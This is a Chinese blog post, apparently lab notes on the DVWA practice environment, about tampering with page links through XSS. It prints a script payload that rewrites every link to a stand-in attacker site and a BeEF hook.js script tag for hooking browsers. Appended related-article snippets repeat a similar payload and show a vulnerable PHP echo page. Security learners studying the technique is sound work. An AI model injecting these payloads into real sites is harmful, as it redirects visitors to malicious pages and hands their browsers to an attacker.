【安全】P 4-3 XSS篡改网页链接

最新推荐文章于 2024-03-12 16:24:39 发布
最新推荐文章于 2024-03-12 16:24:39 发布
阅读量271 收藏 1
点赞数 1
分类专栏: 安全大师 文章标签: 网络安全 信息安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_David_Z/article/details/113836149
版权

目录

0X01 JS代码讲解

window.onload 当窗口加载时,执行匿名函数。
使用for循环遍历所有获得的链接a标签。

<script>
window.onload = function() {
var link=document.getElementsByTagName("a");
for(j = 0; j < link.length; j++) {
   link[j].href="http://attacker-site.com/";}
}
</script>

0X02 XSS篡改链接

将篡改代码注入到对应的XSS位置。以DVWA 反射XSS为例。
在这里插入图片描述

0X03 篡改链接指向不良URL

刷流量,某些站点的重定向。
https://weibo.com/
在这里插入图片描述

0X04 篡改链接指向恶意URL

Beef 进行恶意链接生成,以及利用hook.js执行其他命令。

 <script src=”http://IP:3000/hook.js”></script>

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

(遵纪守法,笔记只是记录实验思路,进去了与本文无关)
-----E-----N-----D-----
😄如有问题,请各位师傅斧正,你的支持是我最大的动力。

骆驼实验室
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【应急响应篇】网页篡改应急响应指南
大河之犬的博客
05-25 1092
根据网页篡改的内容及影响程度,有针对性地进行处置,如果影响程度不大,篡改内容不多,那么可先将相关网页进行下线处理,其他网页正常运行,然后对篡改内容进行删除恢复;如果篡改网页带来的影响较大,被篡改的内容较多,那么建议先对整个网站进行下线处理,同时挂出网站维护的公告。通过流量监控系统,筛选出问题时间线内所有该主机的访问记录,提取 IP 地址,在系统日志、Web 日志和数据库日志中查找该 IP 地址的所有操作。多数的网页篡改是利用漏洞上传Webshell 文件获取权限的,因此也可以使用 D 盾工具进行扫描。
Web应用安全XSS篡改页面(实验).docx
06-19
Web应用安全XSS篡改页面(实验).docx
XSS篡改网页链接学习记录
weixin_50597969的博客
04-15 728
XSS篡改网页链接学习记录JS代码讲解XSS篡改链接篡改链接指向流量URL篡改链接指向恶意URL JS代码讲解 window.onload 当窗口加载时,执行匿名函数。 使用for循环遍历所有获得的链接a标签。 <script> window.onload = function(){ var link=document.getElementsByTagName("a"); //获取a标签,由于页面不一定只有一个a标签,link也可是个数组 for(j=0;j<link.length;j
web安全网页篡改
lizzehqs的博客
09-19 411
web安全网页篡改网页篡改的介绍、监测和防护
网页篡改的情形及防护策略
2401_82472120的博客
02-20 857
北京国联易安信息技术有限公司(原北京智恒联盟科技有限公司)简称“国联易安”,成立于2006年,拥有“国联易安”和“智恒联盟”两个品牌,是国内专注于保密与非密领域的分级保护、等级保护、业务连续性安全和大数据安全产品解决方案与相关技术研究开发的领军企业。系统具备触发式检验引擎,针对受保护的文件增删改操作,一触即发,校验修改的合法性,瞬间清除被非法篡改网页,实时恢复合法网页。系统能够阻断对受保护网页的非法操作,此项技术有效地甄别合法进程和非法进程,阻断非法进程对网页篡改,将非法进程直接阻断。
应急响应-网页篡改
最新发布
qq_50765147的博客
03-12 1048
网页篡改,即攻击者故意篡改网络上传送的保文,通常以入侵系统并篡改数据、劫持网络连接或插入数据等形式进行。网页篡改事件想要做到预先检查和实时防范有一定的难度。网页篡改攻击工具趋向简单化与智能化。由于网络环境复杂,因此导致责任难以追查。虽然目前已经有防火墙、入侵检测等安全方法手段,但各类Web应用系统的复杂性和多样性导致其系统漏洞层出不穷、防不胜防,攻击者入侵和篡改页面的事件时有发生。因此,网页篡改技术成为信息安全领域研究的焦点之一。
第三节 XSS篡改网页链接-01
09-15
XSS 篡改网页链接是一种常见的 web 应用程序安全漏洞,攻击者可以通过 inject 恶意脚本来篡改网页链接,达到攻击用户的目的。为了防止 XSS 攻击,开发者需要采取必要的安全措施,例如,验证用户输入、使用 HTTPS、...
007-Web安全基础3---XSS漏洞(CISP-PTE).pptx
10-18
007-Web安全基础3---XSS漏洞(CISP-PTE).pptx
利用Express模拟web安全之---xss的攻与防
01-26
Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的, 还有另外一种...
007-Web安全基础3 - XSS漏洞.pptx
10-11
XSS(cross site script)或者说跨站脚本是一种Web应用程序的漏洞,恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
网络安全】网站被篡改怎么办?如何进行有效的防护?
A1_3_9_7的博客
01-08 1308
随着互联网的飞速发展,信息传播的速度和范围得到了极大的提升。然而,这也为网页篡改行为提供了可乘之机。网页篡改不仅会损害网站的形象,还可能对用户造成误导,甚至导致安全漏洞。因此,网页篡改技术成为了网络安全领域的重中之重。那么什么是网站篡改呢?网站篡改是一种网络攻击行为,攻击者通过篡改网站内容,传播恶意信息,危害社会安全并牟取暴利。网站篡改通常利用网站应用中的漏洞获取权限,非法篡改Web应用中的内容、植入暗链等。这种攻击具有传播速度快、复制容易、事后消除影响难和实时防范难的特点。
网络安全应急响应----8、网页篡改应急响应
七天
03-22 8830
文章目录一、网页篡改简介二、网页篡改检测技术1、外挂轮询技术2、核心内嵌技术3、事件触发技术三、网页篡改应急响应方法1、发生网页篡改2、隔离被感染的服务器/主机2.1、针对被篡改网页2.2、针对未被篡改网页3、排查业务系统3.1、异常端口、进程排查3.2、可疑文件排查3.3、可疑账号排查3.4、确认篡改时间3.5、日志排查3.6、网络流量排查4、恢复数据和业务四、网页篡改防御方法 一、网页篡改简介 网页篡改:即攻击者故意篡改网络上传送的报文,通常以入侵系统并篡改数据、劫持网络连接或插入数据等形式进行
网站被篡改的主要方式有几种?
oldboyedu1的博客
11-22 2860
在日常生活或者工作中,网页篡改是非常普遍的情况,而且我们平时应该都遇到过网页篡改的事情,当你打开一个网页或网站时,发现内容与网站不符合,这种情况就是被篡改了。1、SQL注入后获取webshell:黑客通过web应用程序的漏洞,通过SQL语句提交非法的语句到数据,通过系统以及第三方软件的漏洞获取web的控制权限或者服务器权限。5、确保自己的web应用、中间件、操作系统等始终处于必要的补丁更新状态,避免黑客利用已知漏洞攻击自己的站点。3、务必在开放访问的所有web应用开发阶段使用必要的安全编码规则;
Web安全系列(一):XSS 攻击基础及原理
2301_77472496的博客
04-23 190
XSS(Cross Site Script),全称跨站脚本攻击,为了与 CSS(Cascading Style Sheet) 有所区别,所以在安全领域称为 XSSXSS 攻击,通常指黑客通过HTML 注入篡改网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击行为。在这种行为最初出现之时,所有的演示案例全是跨域行为,所以叫做 “跨站脚本时至今日,随着Web 端功能的复杂化,应用化,是否跨站已经不重要了,但 XSS 这个名字却一直保留下来。
安全系列之网页篡改系统
qq_29718979的博客
09-25 1936
3手里的一个云项目交付了半年,客户业务系统也顺利通过了云上等保测评二级,为了提前为等保三级做好准备,客户拟购买一些云上的安全服务,需要服务商提供安全咨询,为此我们认真研究了一系列安全服务的工作原理,以提升安全服务能力。今天我们从比较简单的网页篡改系统入手。 一、为什么需要网页篡改 网页相当于是一个企业的脸面,如果发生了黑客恶意修改网页,造成恶性事件,将对企业形象造成影响。因此在等保评...
浏览器打开的网页被恶意篡改的三种解决方式 个人总结的最全的方式,亲测有效
热门推荐
平姐设计的博客
09-24 1万+
在家里折腾了大半天,也百度了很多相关解决方案,但是都不全,这里我把自己总结的方式分享给大家浏览器被2345或者360恶意篡改有三种手段,要是这三种手段都用在你的电脑上了,那抱歉了,解决其中一种方式都是没有用的,下面我们来看看是那种方式,你们也可以检查一下自己的电脑。
基于XSS网页篡改网页劫持,网页钓鱼
qq_40334963的博客
11-04 6001
基于XSS网页篡改网页劫持,网页钓鱼 192.168.80.174服务器上存在漏洞页面xss.php 192.168.80.160服务器上有调用的js xss.php: <?php $op = empty($_GET['op']) ? 'Not entered' : $_GET['op']; echo $op; ?> 浏览器地址栏构建简单的反射型xss判断是否存在xss htt...
网站如何防止篡改
qq3007312960的博客
02-22 1278
所谓的网站篡改,就是网站被黑客攻击以后,网站页面被修改成黄色、赌博等网站,不仅影响企业的外在形象,同时也造成了违法,需要承担相应的责任。 目前网站篡改事件不在少数,尤其是政府、事业单位网站更容易受到网站篡改攻击。 一、网页篡改的途径 (1)SQL注入后获取Webshell: 黑客通过web应用程序的漏洞,通过SQL语句提交非法的语句到数据,通过系统以及第三方软件的漏洞获取web的控制权限或者服务器权限; (2)XSS漏洞引入恶意HTML界面: 被动的跨站攻击可以在合法的地方引入非法的HTML或者
XSS攻击---不得不防的网站安全漏洞
qq_37502042的博客
08-19 534
日常vlog。近期公司参与了一次网络安全大检查。手上有个项目被检测出存在XSS攻击漏洞,解决漏洞的同时,借此机会分享一下关于XSS攻击的一些学习总结。
web安全之kali-xss-beef剑心哥哥
12-24
Kali Linux是一种用于网络安全测试和渗透测试的操作系统,它具有强大的工具和功能,可以用于检测和解决网站的安全漏洞。XSS(跨站脚本攻击)是一种常见的网络安全漏洞,可以通过在网页中插入恶意脚本来获取用户的敏感信息。 BeEF(浏览器控制框架)是一个用于检测和利用Web浏览器漏洞的工具,可以用于执行XSS攻击,获取用户浏览器的信息和控制用户的浏览器。在Kali Linux中结合使用XSS和BeEF可以实现对网站的全面安全检测和攻击。 “剑心哥哥”可能是指对网络安全有一定研究和实践经验的人,因为这些工具都需要一定的技术和知识才能使用。结合使用Kali Linux、XSS和BeEF可以帮助“剑心哥哥”对网站进行全面的安全检测,并了解和利用XSS漏洞来展示其危害性。同时,也需要“剑心哥哥”具备一定的伦理和法律意识,不能利用这些工具进行非法攻击和侵犯他人隐私。通过学习和实践网络安全相关知识,我们可以更好地保护自己的网络安全,并为网络安全事业做出贡献。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值